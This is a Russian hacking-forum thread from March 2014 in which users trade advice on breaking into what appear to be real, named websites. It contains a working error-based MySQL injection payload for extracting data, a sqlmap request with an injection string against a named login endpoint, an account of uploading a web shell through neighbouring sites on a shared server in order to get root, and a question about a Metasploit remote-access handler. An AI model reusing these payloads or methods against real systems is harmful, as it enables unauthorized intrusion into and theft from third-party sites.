27.03.2014, 22:33
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Rextor
Пробовал. СУБД локально доступна только через инъекцию (прав на запись нет), удаленно - не настроен сервис в принципе. FTP отгорожен полностью через hosts.deny, ssh доступен лишь для нескольких айпи адресов через hosts.allow/deny. Каких-либо уязвимостей на исполнение кода в коде сайта найти не удалось. Наружу смотрят лишь Postfix, Dovecot, Apache и Webmin. На руках лишь чтение общих файлов системы через php и select инъекция для mysql.
Самое обидное то, что в отличие от другого сайта, где у меня есть шелл, но нет возможности поднять привилегии, этот сайт, судя по версии ядра, очень хорошо рутается.
Попробуйте залиться через соседей, прочтя конфиг через local load infile в мускуле.
|
|
|
27.03.2014, 22:52
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Аналогично, пробовал Изначально у меня был один сайт, про который я и писал сейчас. Через конфиги узнал, что у него есть "зеркало" на отдельном сервере (тестовая версия), на котором еще было много соседних сайтов, один из которых был уязвим, что позволило залить шелл на второй сервер и сделать копию интересуемого сайта для более полного анализа. К сожалению, новых уязвимостей на первом сайте/сервере найти все равно не удалось.
|
|
|
|
28.03.2014, 12:04
|
|
Новичок
Регистрация: 12.02.2013
Сообщений: 21
С нами:
6972086
Репутация:
0
|
|
Привет хацкеры)Учусь sql-inj,но не могу найти ответа в гугле)
Для проверки сайта на скули обязательно урл вида
Сообщение от None
index1.php?id=1 или user=1
,т.е обязательно урл должен заканчиваться на значение параметра?
Просто на данном сайте
Сообщение от None
http://onecapper.ru
всё переименовано,для красоты или же в целях безопасности)
Если возможно поподробнее) |
|
|
|
28.03.2014, 12:11
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2012
Сообщений: 1,266
С нами:
7388246
Репутация:
391
|
|
CoolHucker
инъекция может быть где угодно POST\ GET и в кукисах, заголовках.
|
|
|
|
28.03.2014, 12:18
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от CoolHucker
Привет хацкеры)Учусь sql-inj,но не могу найти ответа в гугле)
Для проверки сайта на скули обязательно урл вида ,т.е обязательно урл должен заканчиваться на значение параметра?
Просто на данном сайте всё переименовано,для красоты или же в целях безопасности)
Если возможно поподробнее)
https://forum.antichat.net/thread50572.html
|
|
|
|
28.03.2014, 13:37
|
|
Новичок
Регистрация: 12.02.2013
Сообщений: 21
С нами:
6972086
Репутация:
0
|
|
Спс керберус)где почитать не подскажешь? Просто там страницы типа,а в мануалах значения =1 =4 и тд)
Сообщение от None
http://onecapper.ru/garantii-n
http://onecapper.ru/prays-list
Как проверить на скули?Web-Cruiser-lol
P.S Плюхи раздал |
|
|
|
29.03.2014, 03:21
|
|
Новичок
Регистрация: 30.09.2012
Сообщений: 24
С нами:
7166486
Репутация:
0
|
|
Знатоки!! Помогите раскрутить одну SQL.
URL привести не могу, вот полный SQL запрос:
Код:
SELECT DISTINCT sc.id,sc.published,sc.template,sc.pagetitle FROM table sc LEFT JOIN table2
dg on dg.document = sc.id WHERE sc.id IN (1,2,3) AND sc.published=1 AND sc.deleted=0 AND (sc.privateweb=0) GROUP BY sc.id ORDER BY sc.pagetitle [SQL_HERE]
Там где [SQL_HERE], соответственно имеем иньект. На его место я вставляю:
Код:
(1)OR(SELECT(1)FROM(SELECT COUNT(0),CONCAT((SELECT(CONCAT_WS(VERSION(),(SELECT VERSION())))),FLOOR(RAND(0)*2))FROM(INFORMATION_SCHEMA.TABLES) GROUP BY 2)A)
И на первый взгляд всё работает, выдаётся Duplicate entry '5.4.32' for key 'group_key'
Но как только я пытаюсь вывести информацию из любой таблицы, к примеру таким SQL запросом:
Код:
SELECT DISTINCT sc.id,sc.published,sc.template,sc.pagetitle FROM table sc LEFT JOIN table2
dg on dg.document = sc.id WHERE sc.id IN (1,2,3) AND sc.published=1 AND sc.deleted=0 AND (sc.privateweb=0) GROUP BY sc.id ORDER BY sc.pagetitle
(1)OR(SELECT(1)FROM(SELECT COUNT(0),CONCAT((SELECT(CONCAT_WS(VERSION(),(SELECT COUNT(*) from table)))),FLOOR(RAND(0)*2))FROM(INFORMATION_SCHEMA.TABLES) GROUP BY 2)A)
Я получаю неизвестную для меня ошибку: Table 'table' doesn't exist
И как бы я не крутил SQL, от неё избавиться никак не могу.
Буду благодарен если кто подскажет как правильно составить SQL запрос в моем случае, чтобы выудить произвольную информацию из доступных таблиц.
Спасибо. |
|
|
|
29.03.2014, 05:05
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Сообщение от Сбербанк
Знатоки!! Помогите раскрутить одну SQL.
URL привести не могу, вот полный SQL запрос:
Код:
SELECT DISTINCT sc.id,sc.published,sc.template,sc.pagetitle FROM table sc LEFT JOIN table2
dg on dg.document = sc.id WHERE sc.id IN (1,2,3) AND sc.published=1 AND sc.deleted=0 AND (sc.privateweb=0) GROUP BY sc.id ORDER BY sc.pagetitle [SQL_HERE]
Там где [SQL_HERE], соответственно имеем иньект. На его место я вставляю:
Код:
(1)OR(SELECT(1)FROM(SELECT COUNT(0),CONCAT((SELECT(CONCAT_WS(VERSION(),(SELECT VERSION())))),FLOOR(RAND(0)*2))FROM(INFORMATION_SCHEMA.TABLES) GROUP BY 2)A)
И на первый взгляд всё работает, выдаётся Duplicate entry '5.4.32' for key 'group_key'
Но как только я пытаюсь вывести информацию из любой таблицы, к примеру таким SQL запросом:
Код:
SELECT DISTINCT sc.id,sc.published,sc.template,sc.pagetitle FROM table sc LEFT JOIN table2
dg on dg.document = sc.id WHERE sc.id IN (1,2,3) AND sc.published=1 AND sc.deleted=0 AND (sc.privateweb=0) GROUP BY sc.id ORDER BY sc.pagetitle
(1)OR(SELECT(1)FROM(SELECT COUNT(0),CONCAT((SELECT(CONCAT_WS(VERSION(),(SELECT COUNT(*) from table)))),FLOOR(RAND(0)*2))FROM(INFORMATION_SCHEMA.TABLES) GROUP BY 2)A)
Я получаю неизвестную для меня ошибку: Table 'table' doesn't exist
И как бы я не крутил SQL, от неё избавиться никак не могу.
Буду благодарен если кто подскажет как правильно составить SQL запрос в моем случае, чтобы выудить произвольную информацию из доступных таблиц.
Спасибо. Table 'table' doesn't exist - может быть нет такой таблицы?
|
|
|
|
30.03.2014, 16:45
|
|
Познающий
Регистрация: 13.02.2011
Сообщений: 51
С нами:
8023286
Репутация:
0
|
|
ребята подскажите в чем проблема и как ее исправить, какие опции лучше поставить в sqlmap, сканер показал что есть слепые, причем многочисленные, но когда начинаю работать sqlmap,ом выдает после работы ошибку [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 253 times, 500 (Internal Server Error) - 105 times
линк
https://login01.stockholm.se/siteminderagent/formsja/DynamicRetry.fcc
POST
SMENC=SHIFT_JIS&SMLOCALE=JP-jp&USER=&PASSWORD=&target=&smauthreason=&smagentna me=%27+and+%27f%27%3D%27f%27+--+&postpreservationdata=
помогите люди советом и подсказкой
|
|
|
|
30.03.2014, 16:50
|
|
Новичок
Регистрация: 28.03.2014
Сообщений: 21
С нами:
6383126
Репутация:
0
|
|
Здраствуйте, изучаю metasploit. пытаюсь создать соединение с удаленным доступом, используя экзешник, и хандлер.Локально все работает прекрасно, но увы, глобально нет.
Hadler failed to bind . пробовал и на виртуалке, и грузится с флешки, все равно так. порты открыты, пробовал менять и 4444 и 5555 итд..не получается.можете что-нибудь посоветовать?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Комбинированный вид
